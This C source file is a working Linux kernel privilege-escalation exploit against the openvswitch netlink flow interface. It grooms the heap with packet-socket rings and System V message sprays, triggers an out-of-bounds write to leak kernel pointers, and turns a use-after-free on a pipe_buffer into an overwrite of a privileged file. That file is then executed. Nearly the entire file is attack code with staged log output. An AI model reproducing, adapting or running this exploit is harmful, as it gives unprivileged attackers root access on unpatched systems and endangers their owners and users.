 * Run all one-time setup in a fixed order: pin to CPU 0, enter the new
 * namespaces, open the netlink socket and resolve family ids, create the
 * message queues, create the socket pairs. Each step exits via die() on failure.
 */
void do_init() {
    bind_cpu();
    init_unshare();
    init_nl_sock();
    init_msq();
    init_sock();
}

/*
 * Try to receive one MTYPE_A message from every queue in msqid_1[] without
 * blocking; results are ignored, so empty queues are simply skipped.
 */
void clean_msq_1() {
    int q = 0;

    while (q < NUM_MSQIDS_1) {
        msgrcv(msqid_1[q], msg_a, MSG_A_TEXT_SIZE, MTYPE_A, IPC_NOWAIT);
        q++;
    }
}

/*
 * For every queue in msqid_2[], try to receive without blocking one message
 * of each of the 16 types MTYPE_B | (j << 8), j = 0..15; results are ignored.
 */
void clean_msq_2() {
    int q;
    int slot;

    for (q = 0; q < NUM_MSQIDS_2; q++) {
        for (slot = 0; slot < 0x10; slot++) {
            long wanted = MTYPE_B | (slot << 8);

            msgrcv(msqid_2[q], msg_b, MSG_B_TEXT_SIZE, wanted, IPC_NOWAIT);
        }
    }
}

/*
 * Write `size` bytes from ptr NUM_SKBUFFS times into the first end of every
 * socket pair in sock_pairs[]; a failing write() is fatal (die).
 */
void spray_skbuff_data(void *ptr, size_t size) {
    int pair;
    int round;

    for (pair = 0; pair < NUM_SOCKETS; pair++) {
        int wfd = sock_pairs[pair][0];

        for (round = 0; round < NUM_SKBUFFS; round++) {
            ssize_t rc = write(wfd, ptr, size);

            if (rc < 0) {
                die("write to sock pairs failed");
            }
        }
    }
}

/*
 * Read up to `size` bytes into ptr NUM_SKBUFFS times from the second end of
 * every socket pair in sock_pairs[]; a failing read() is fatal (die).
 */
void free_skbuff_data(void *ptr, size_t size) {
    int pair;
    int round;

    for (pair = 0; pair < NUM_SOCKETS; pair++) {
        int rfd = sock_pairs[pair][1];

        for (round = 0; round < NUM_SKBUFFS; round++) {
            ssize_t rc = read(rfd, ptr, size);

            if (rc < 0) {
                die("read from sock pairs failed");
            }
        }
    }
}

/*
 * Switch packet socket s to TPACKET_V3 and install an RX ring.
 *
 * block_size/frame_size/block_nr describe the ring; the frame count is
 * derived as (block_size * block_nr) / frame_size. sizeof_priv and timeout
 * go to tp_sizeof_priv and tp_retire_blk_tov. Either setsockopt() failing
 * is fatal (die).
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    struct tpacket_req3 ring;
    int version = TPACKET_V3;

    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    memset(&ring, 0, sizeof(ring));
    ring.tp_block_size = block_size;
    ring.tp_block_nr = block_nr;
    ring.tp_frame_size = frame_size;
    ring.tp_frame_nr = (block_size * block_nr) / frame_size;
    ring.tp_sizeof_priv = sizeof_priv;
    ring.tp_retire_blk_tov = timeout;
    ring.tp_feature_req_word = 0;

    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

/*
 * Create an AF_PACKET raw socket for ETH_P_ALL, give it an RX ring via
 * packet_socket_rx_ring_init(), and bind it to the "lo" interface.
 *
 * Returns the socket descriptor; every failure is fatal (die).
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    struct sockaddr_ll lo_addr;
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

    if (fd < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(fd, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    memset(&lo_addr, 0, sizeof(lo_addr));
    lo_addr.sll_family = PF_PACKET;
    lo_addr.sll_protocol = htons(ETH_P_ALL);
    lo_addr.sll_ifindex = if_nametoindex("lo");
    lo_addr.sll_hatype = 0;
    lo_addr.sll_pkttype = 0;
    lo_addr.sll_halen = 0;

    if (bind(fd, (struct sockaddr *)&lo_addr, sizeof(lo_addr)) < 0) {
        die("bind(AF_PACKET): %m");
    }

    return fd;
}

/*
 * Open a packet socket whose RX ring has `count` blocks of `size` bytes
 * (frame size 2048, no private area, timeout 100) and return its descriptor.
 */
int pagealloc_pad(int count, int size) {
    int ring_fd = packet_socket_setup(size, 2048, count, 0, 100);

    return ring_fd;
}

/*
 * Ask the datapath family to create a datapath named "br1337"
 * (OVS_DP_CMD_NEW) and report whether an interface of that name now exists.
 *
 * The send result is not checked; success is judged only by
 * if_nametoindex("br1337"). Failure is logged as a warning, not treated as fatal.
 */
void create_br1337() {
    struct ovs_attr ovs_attrs[] = {
        {OVS_DP_ATTR_NAME, "br1337", 7},     // name including the NUL terminator
        {OVS_DP_ATTR_UPCALL_PID, "aaa", 4},  // 4 payload bytes: 'a','a','a','\0'
    };
    ovsmsg_send(nl_sockfd, dp_family_id, 0, OVS_DP_CMD_NEW, OVS_DATAPATH_VERSION, 1, ovs_attrs, ELEM_CNT(ovs_attrs));
    int ifindex = if_nametoindex("br1337");
    if (!ifindex) {
        logw("create br1337 failed: %m");
        logw("maybe openvswitch module not enabled in kernel?");
        logw("further exploitation may fail");
    } else {
        logd("br1337 ifindex: %d", ifindex);
    }
}

/*
 * Send one OVS_FLOW_CMD_NEW request on the flow family.
 *
 * The request carries a flow key (ethernet, ethertype, ipv4) and an actions
 * blob made of pad_action_cnt OVS_ACTION_ATTR_SET entries followed by a
 * single OVS_ACTION_ATTR_USERSPACE entry; vuln_size bytes from vuln_data
 * are copied padding_size bytes after the start of that last entry.
 *
 * vuln_data  bytes placed at the tail of the actions blob
 * vuln_size  number of bytes in vuln_data
 *
 * NOTE(review): the result of the first malloc() is not checked, neither
 * heap buffer is freed, the result of ovsmsg_send() is ignored, and the part
 * of action_nla between the written entries and the attribute length passed
 * to ovsmsg_send() is never initialised. Left unchanged because the exact
 * byte layout is what this routine exists to produce.
 */
void trigger_vuln(void *vuln_data, size_t vuln_size) {
    struct nlattr *key_nla;

    struct ovs_key_ethernet eth_key;
    // each literal is 5 bytes plus its NUL terminator, i.e. 6 bytes copied
    memcpy(eth_key.eth_src, "\x01\x02\x03\x04\x05", 6);
    memcpy(eth_key.eth_dst, "\x05\x04\x03\x02\x01", 6);

    struct ovs_key_ipv4 ipv4_key = {
        .ipv4_src = 0x12345678,
        .ipv4_dst = 0x87654321,
        .ipv4_proto = 1,
        .ipv4_tos = 1,
        .ipv4_ttl = 1,
        .ipv4_frag = 2,
    };

    struct ovs_attr key_attrs[] = {
        {OVS_KEY_ATTR_ETHERNET, &eth_key, sizeof(struct ovs_key_ethernet)},
        {OVS_KEY_ATTR_ETHERTYPE, "\x08\x00", 2},
        {OVS_KEY_ATTR_IPV4, &ipv4_key, sizeof(struct ovs_key_ipv4)},
    };

    // serialise the key attributes back to back into key_nla
    int key_size = 0;
    for (int i = 0; i < ELEM_CNT(key_attrs); i++) {
        key_size += nla_total_size(key_attrs[i].len);
    }

    key_nla = (struct nlattr *)malloc(key_size);
    void *key_offset = key_nla;
    for (int i = 0; i < ELEM_CNT(key_attrs); i++) {
        struct nlattr *nla = key_offset;
        nla->nla_type = key_attrs[i].type;
        nla->nla_len = nla_attr_size(key_attrs[i].len);
        memcpy(NLA_DATA(nla), key_attrs[i].data, key_attrs[i].len);
        key_offset += nla_total_size(key_attrs[i].len);
    }

    char *action_nla = (char *)malloc(0x10000);
    if (!action_nla) {
        die("malloc: %m");
    }

    // 0x14 -> 0x20 (+0xc)
    const int ori_size = 0x14;
    const int rewrite_size = 0x1c;
    const int header_size = 0x1c;

    int pad_action_cnt = (0xfc00 - header_size) / (4 + rewrite_size);

    // padding entries: SET{ ETHERNET{ 0xc bytes of 'k' } }, ori_size bytes each
    int i = 0;
    for (i = 0; i < pad_action_cnt; i++) {
        struct nlattr *ptr = (struct nlattr *)(action_nla + i * ori_size);
        ptr->nla_len = ori_size;
        ptr->nla_type = OVS_ACTION_ATTR_SET;

        ptr = NLA_DATA(ptr);
        ptr->nla_len = 0x10;
        ptr->nla_type = OVS_KEY_ATTR_ETHERNET;

        ptr = NLA_DATA(ptr);
        memset(ptr, 'k', 0xc);
    }

    const uint32_t padding_size = 0x10000 - (header_size + (4 + rewrite_size) * pad_action_cnt);
    // stored in 16 bits because nla_len is a 16-bit field
    uint16_t evil_size = padding_size + vuln_size;
    {
        // final entry, placed right after the last padding entry
        struct nlattr *ptr = (struct nlattr *)(action_nla + i * ori_size);
        ptr->nla_len = evil_size;
        ptr->nla_type = OVS_ACTION_ATTR_USERSPACE;

        // sub attr1
        struct nlattr *sub_ptr = NLA_DATA(ptr);
        sub_ptr->nla_len = 8;
        sub_ptr->nla_type = OVS_USERSPACE_ATTR_PID;
        char *sub_buff = NLA_DATA(sub_ptr);
        memset(sub_buff, 'A', 4);

        // fill the rest of the first padding_size bytes of the entry with 'x'
        char *padding_ptr = ((char *)sub_ptr) + NLA_ALIGN(sub_ptr->nla_len);
        memset(padding_ptr, 'x', padding_size - (padding_ptr - (char *)ptr));

        memcpy((char *)action_nla + i * ori_size + padding_size, vuln_data, vuln_size);
    }

    struct ovs_attr ovs_attrs[] = {
        {OVS_FLOW_ATTR_KEY, key_nla, key_size},
        {OVS_FLOW_ATTR_ACTIONS, action_nla, nla_total_size(0xff00)},
    };

    ovsmsg_send(nl_sockfd, flow_family_id, 0, OVS_FLOW_CMD_NEW, OVS_FLOW_VERSION,
                0, ovs_attrs, ELEM_CNT(ovs_attrs));
}

/*
 * First stage. In order: open a series of packet-socket rings, fill every
 * queue in msqid_1[] with one MTYPE_A message, close the remaining
 * single-block rings, call trigger_vuln(), look for a queue whose message
 * now reads back with the enlarged size, refill msqid_2[] with MTYPE_B
 * messages and read the enlarged message again to pick up a header that
 * follows it.
 *
 * On success fills list1_corrupted_msqid, list2_leak_msqid,
 * list2_leak_mtype, list2_leak_security, list2_uaf_msg_addr and
 * list2_uaf_mtype and returns 0. Returns 1 when no enlarged message is found
 * or the re-read does not show MSG_SIG; several failures exit through die().
 *
 * NOTE(review): `buff` is unused; descriptors returned by the first five
 * pagealloc_pad() calls are never stored or closed; the `> 0` test on
 * fengshui_skfd[] would skip descriptor 0. Statement order is significant
 * here, so the code is left exactly as it was.
 */
int exploit_step1() {
    char buff[0x1000];

    logd("do heap fengshui to reduce noise ...");
    pagealloc_pad(1000, 0x1000);
    pagealloc_pad(500, 0x2000);
    pagealloc_pad(200, 0x4000);
    pagealloc_pad(200, 0x8000);
    pagealloc_pad(100, 0x10000);
    int fengshui_skfd[fengshui_skfd_cnt];
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
    }
    // close every second ring now; the others are closed after the spray
    for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
        close(fengshui_skfd[i]);
        fengshui_skfd[i] = -1;
    }

    // spray msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
    logd("sparying msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msg_a->mtype = MTYPE_A;
        memset(msg_a->mtext, 'Q', MSG_A_TEXT_SIZE);
        // tag each message with the signature and its queue index
        ((int *)msg_a->mtext)[0] = MSG_SIG;
        ((int *)msg_a->mtext)[1] = i;
        if (msgsnd(msqid_1[i], msg_a, MSG_A_TEXT_SIZE, 0) < 0) {
            die("msgsnd(): %m");
        }
    }

    logd("free other rx_ring buffer ... ");
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        if (fengshui_skfd[i] > 0) {
            close(fengshui_skfd[i]);
            fengshui_skfd[i] = -1;
        }
    }

    logd("trigger vuln to do heap oob write ...");
    uint64_t vuln_buf[] = {
        0,                                     // m_list.next
        0,                                     // m_list.prev
        MTYPE_A,                               // m_type
        MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), // m_ts
    };
    trigger_vuln(&vuln_buf, sizeof(vuln_buf));

    // recv from buffer to see if leak success
    logd("search corrupted msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        // MSG_COPY peeks at the message without removing it from the queue
        ssize_t copy_size = msgrcv(msqid_1[i], msg_a_oob, MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), 0, MSG_COPY | IPC_NOWAIT);
        if (copy_size < 0) {
            continue;
        }
        if (copy_size == MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400)) {
            logi("corrupted msg_msg found, id: %d", msqid_1[i]);
            list1_corrupted_msqid = msqid_1[i];
            // replace the slot with a fresh queue so later loops skip the found one
            msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
            uint64_t *oob_data = (uint64_t *)(msg_a_oob->mtext + MSG_A_TEXT_SIZE);
            if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
                logd("but the next object is not allocated by msg_msgseg");
            }
            break;
        }
    }
    if (list1_corrupted_msqid < 0) {
        loge("can't found corrupted msg_msg, and kernel may crash :(");
        clean_msq_1();
        return 1;
    }

    // clean uncorrupted msg_msg
    logd("clean unused msg_msg ...");
    clean_msq_1();

    // realloc 0x400 slab with msg_msg
    logd("alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...");
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        memset(msg_b->mtext, 'W', MSG_B_TEXT_SIZE);
        ((int *)msg_b->mtext)[0] = MSG_SIG;
        ((int *)msg_b->mtext)[1] = i;
        // 16 messages per queue, distinguished by bits 8..11 of the type
        for (int j = 0; j < 0x10; j++) {
            msg_b->mtype = MTYPE_B | (j << 8);
            if (msgsnd(msqid_2[i], msg_b, MSG_B_TEXT_SIZE, 0) < 0) {
                die("msgsnd() fail");
            }
        }
    }

    // hope leak happen
    {
        ssize_t copy_size = msgrcv(list1_corrupted_msqid, msg_a_oob, MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400), 0, MSG_COPY | IPC_NOWAIT);
        if ((copy_size < 0) || (copy_size != MSG_TEXT_SIZE(MSG_A_RAW_SIZE + 0x400))) {
            die("recv from corrupted msg_msg failed");
        }
        // interpret the bytes past the normal text as a message header
        uint64_t *oob_data = (uint64_t *)(msg_a_oob->mtext + MSG_A_TEXT_SIZE);
        struct msg_msg *p = (struct msg_msg *)oob_data;
        if (((int *)&p->mtext)[0] != MSG_SIG) {
            loge("bad luck, we don't catch 0x400 msg_msg");
            clean_msq_2();
            return 1;
        }
        logd("it works :)");

        // the second int of the text is the msqid_2[] index written above
        list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
        list2_leak_mtype = p->m_type;
        list2_leak_security = p->security;
        // pick the neighbouring message in the same queue: previous one if
        // this is not the first type, otherwise the next one
        if (list2_leak_mtype > 0x100) {
            list2_uaf_msg_addr = p->m_list.prev;
            list2_uaf_mtype = p->m_type - 0x0100;
        } else {
            list2_uaf_msg_addr = p->m_list.next;
            list2_uaf_mtype = p->m_type + 0x0100;
        }

        msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        logi("leak list2_leak_msqid: %d", list2_leak_msqid);
        logi("leak list2_leak_mtype: 0x%x", list2_leak_mtype);
        logi("leak list2_uaf_msg_addr: 0x%lx", list2_uaf_msg_addr);
        logi("leak list2_uaf_mtype: 0x%x", list2_uaf_mtype);
    }

    // clean uncorrupted msg_msg
    logd("clean unused msg_msg ...");
    clean_msq_2();

    return 0;
}

/**
 * Second stage: uses the values recorded by step 1 (list2_uaf_msg_addr,
 * list2_leak_msqid, list2_uaf_mtype, list2_leak_security) to end up with a
 * pipe whose second pipe_buffer entry references ATTACK_FILE and can be
 * edited from user space, then writes attack_data through that pipe and
 * checks that the file content changed.
 *
 * The order of the allocation / free statements below is significant and
 * is intentionally left exactly as in the original implementation.
 *
 * Returns 0 on success. Every failure path calls die(), which presumably
 * does not return (NOTE(review): confirm against die()'s definition), so
 * the caller's retry loop is not expected to see a non-zero value.
 */
int exploit_step2() {
    char buff[0x1000];

    logd("do heap fengshui to reduce noise ...");
    pagealloc_pad(1000, 0x1000);
    pagealloc_pad(500, 0x2000);
    pagealloc_pad(200, 0x4000);
    pagealloc_pad(200, 0x8000);
    pagealloc_pad(100, 0x10000);
    int fengshui_skfd[fengshui_skfd_cnt];
    for (int i = 0; i < fengshui_skfd_cnt; i++) {
        fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
    }
    // Release every odd-indexed descriptor; the even ones are released
    // later, after the msg_msg spray.
    for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
        close(fengshui_skfd[i]);
        fengshui_skfd[i] = -1;
    }

    // alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
    logd("sparying msg_msg ...");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        msg_a->mtype = MTYPE_A;
        memset(msg_a->mtext, 'Q', MSG_A_TEXT_SIZE);
        // Tag each message with a signature and the index of its queue.
        ((int *)msg_a->mtext)[0] = MSG_SIG;
        ((int *)msg_a->mtext)[1] = i;
        if (msgsnd(msqid_1[i], msg_a, MSG_A_TEXT_SIZE, 0) < 0) {
            die("msgsnd() fail");
        }
    }

    logd("free other rx_ring buffer ... ");
    for (int i = 0; i < fengshui_skfd_cnt; i += 1) {
        // NOTE(review): "> 0" also skips descriptor 0; the sentinel used
        // above is -1. Left unchanged because pagealloc_pad()'s return
        // convention is not visible here.
        if (fengshui_skfd[i] > 0) {
            close(fengshui_skfd[i]);
            fengshui_skfd[i] = -1;
        }
    }

    logd("trigger vuln to do heap oob write ...");
    uint64_t vuln_buf[] = {
        list2_uaf_msg_addr, // m_list.next
    };
    trigger_vuln(&vuln_buf, sizeof(vuln_buf));

    // free uaf msg_msg
    logd("free uaf msg_msg from correct msqid");
    if (msgrcv(list2_leak_msqid, msg_b, MSG_B_TEXT_SIZE, list2_uaf_mtype, 0) < 0) {
        die("msgrcv() fail");
    }

    // spray skbuff_data to re-acquire uaf msg_msg and fake the header
    logd("spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg");
    {
        memset(buff, 0, sizeof(buff));
        struct msg_msg *p = (struct msg_msg *)buff;
        p->m_list.next = list2_uaf_msg_addr;
        p->m_list.prev = list2_uaf_msg_addr;
        p->m_ts = 0x100;
        p->m_type = MTYPE_FAKE;
        p->next = 0;
        p->security = list2_leak_security; // bypass selinux
        spray_skbuff_data(buff, 0x400 - 0x140);
    }

    // free uaf msg_msg
    logd("free skbuff_data using fake msqid");
    for (int i = 0; i < NUM_MSQIDS_1; i++) {
        if (msgrcv(msqid_1[i], msg_b, MSG_B_TEXT_SIZE, MTYPE_FAKE, IPC_NOWAIT) > 0) {
            logd("freed using msqid %d", i);
            break;
        }
    }

    // filled with pipe_buffer
    logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
    int attack_fd = open(ATTACK_FILE, O_RDONLY);
    if (attack_fd < 0) {
        die("open %s: %m", ATTACK_FILE);
    }
    for (int i = 0; i < NUM_PIPES; i++) {
        if (pipe(pipes[i])) {
            die("alloc pipe failed");
        }

        // The written length (0x100 + i) is what later identifies the pipe
        // (see "ptr[0].len & 0xff" below), so a short write must not go
        // unnoticed.
        if (write(pipes[i][1], buff, 0x100 + i) != 0x100 + i) {
            die("write to pipe failed");
        }

        // Splice exactly one byte at file offset 1; the search below looks
        // for an entry with len == 1 and offset == 1, so anything other
        // than one spliced byte is a failure.
        loff_t offset = 1;
        ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
        if (nbytes != 1) {
            die("splice() failed");
        }
    }

    logd("free skbuff_data to make pipe_buffer become UAF");
    int uaf_pipe_idx = -1;
    char pipe_buffer_backup[0x280];
    int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
    {
        struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
        uint64_t size = 0x400 - 0x140;
        for (int i = 0; i < NUM_SOCKETS; i++) {
            for (int j = 0; j < NUM_SKBUFFS; j++) {
                if (read(sock_pairs[i][1], ptr, size) < 0) {
                    die("read from sock pairs failed");
                }
                if (ptr[1].len == 1 && ptr[1].offset == 1) {
                    // find pipe_buffer
                    memcpy(pipe_buffer_backup, ptr, sizeof(pipe_buffer_backup));
                    // The low byte of the first entry's length encodes the
                    // pipe index chosen when the pipe was filled.
                    uaf_pipe_idx = ptr[0].len & 0xff;
                    logi("uaf_pipe_idx: %d", uaf_pipe_idx);
                    goto out1;
                }
            }
        }
    }
out1:
    if (uaf_pipe_idx < 0) {
        die("can't find corrupted pipe_buffer");
    }

    logd("edit pipe_buffer->flags");
    {
        memset(buff, 0, sizeof(buff));
        memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));
        struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
        ptr[1].flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8
        ptr[1].len = 0;
        ptr[1].offset = 0;
        ptr[1].ops = ptr[0].ops; // for kernel < 5.8
        spray_skbuff_data(buff, 0x400 - 0x140);
    }

    logd("try to overwrite %s", ATTACK_FILE);
    {
        ssize_t nbytes = write(pipes[uaf_pipe_idx][1], attack_data, sizeof(attack_data));
        if (nbytes < 0) {
            die("write failed");
        }
        if ((size_t)nbytes < sizeof(attack_data)) {
            die("short write");
        }
    }

    logd("see if %s changed", ATTACK_FILE);
    {
        int fd = open(ATTACK_FILE, O_RDONLY);
        if (fd < 0) {
            die("open attack file");
        }
        char tmp_buffer[0x10] = {0};
        ssize_t nread = read(fd, tmp_buffer, sizeof(tmp_buffer));
        // The marker occupies bytes 9..12; refuse to compare bytes that
        // were never read.
        if (nread < (ssize_t)(9 + sizeof(uint32_t))) {
            die("read attack file failed");
        }
        close(fd);
        // Offset 9 is not 4-byte aligned, so copy the marker out instead of
        // dereferencing a cast pointer.
        uint32_t marker;
        memcpy(&marker, tmp_buffer + 9, sizeof(marker));
        if (marker != 0x56565656) {
            die("overwrite attack file failed: 0x%08x", marker);
        }
    }

    logi("exploit success");

    // clean
    close(attack_fd);
    close(pipes[uaf_pipe_idx][0]);
    close(pipes[uaf_pipe_idx][1]);
    for (int i = 0; i < NUM_MSQIDS_2; i++) {
        memset(msg_b->mtext, 0, MSG_B_TEXT_SIZE);
        msg_b->mtype = MTYPE_B;
        if (msgsnd(msqid_2[i], msg_b, MSG_B_TEXT_SIZE, 0) < 0) {
            die("msgsnd() fail");
        }
    }

    return 0;
}

/**
 * Entry point. Forks once:
 *  - the child runs do_init(), create_br1337(), then exploit_step1() and
 *    exploit_step2() (each retried while it returns non-zero), writes a
 *    single 'T' to sync_pipe and then sleeps forever instead of exiting;
 *  - the parent waits for that byte on sync_pipe and, once it arrives,
 *    replaces itself with ATTACK_FILE via execl().
 *
 * Returns 1 if the child never signalled success or execl() failed; on
 * success execl() does not return.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    if (pipe(sync_pipe) < 0) {
        die("pipe() fail: %m");
    }

    pid_t pid = fork();
    if (pid < 0) {
        // Without this check a failed fork() would fall into the parent
        // branch and block on a pipe nobody will ever write to.
        die("fork() fail: %m");
    }

    if (pid == 0) {
        logd("initialize exploit environment ...");
        do_init();

        logd("create br to check if openvswitch works ...");
        create_br1337();

        logd("do exploit step 1 ...");
        while (exploit_step1()) {
            logw("retry ...");
        }

        logd("do exploit step 2 ...");
        while (exploit_step2()) {
            logw("retry ...");
        }

        logd("maybe unsafe to exit, sleep infinitely ...");
        if (write(sync_pipe[1], "T", 1) != 1) {
            // Deliberately not fatal: this process must not exit here.
            logw("failed to notify parent");
        }
        while (1) {
            sleep(10);
        }
    }

    // Drop the parent's copy of the write end so that read() returns EOF
    // if the child terminates without signalling, instead of blocking
    // forever on a pipe the parent itself keeps open.
    // NOTE(review): this assumes no other long-lived process inherits
    // sync_pipe[1] (e.g. from do_init()) — confirm.
    close(sync_pipe[1]);

    char sync_byte = 0;
    ssize_t nread = read(sync_pipe[0], &sync_byte, 1);
    if (nread != 1 || sync_byte != 'T') {
        loge("exploit process did not signal success");
        return 1;
    }

    // The variadic sentinel must be a null pointer of type char *.
    execl(ATTACK_FILE, ATTACK_FILE, (char *)NULL);

    // Only reached when execl() fails.
    loge("execl %s: %m", ATTACK_FILE);
    return 1;
}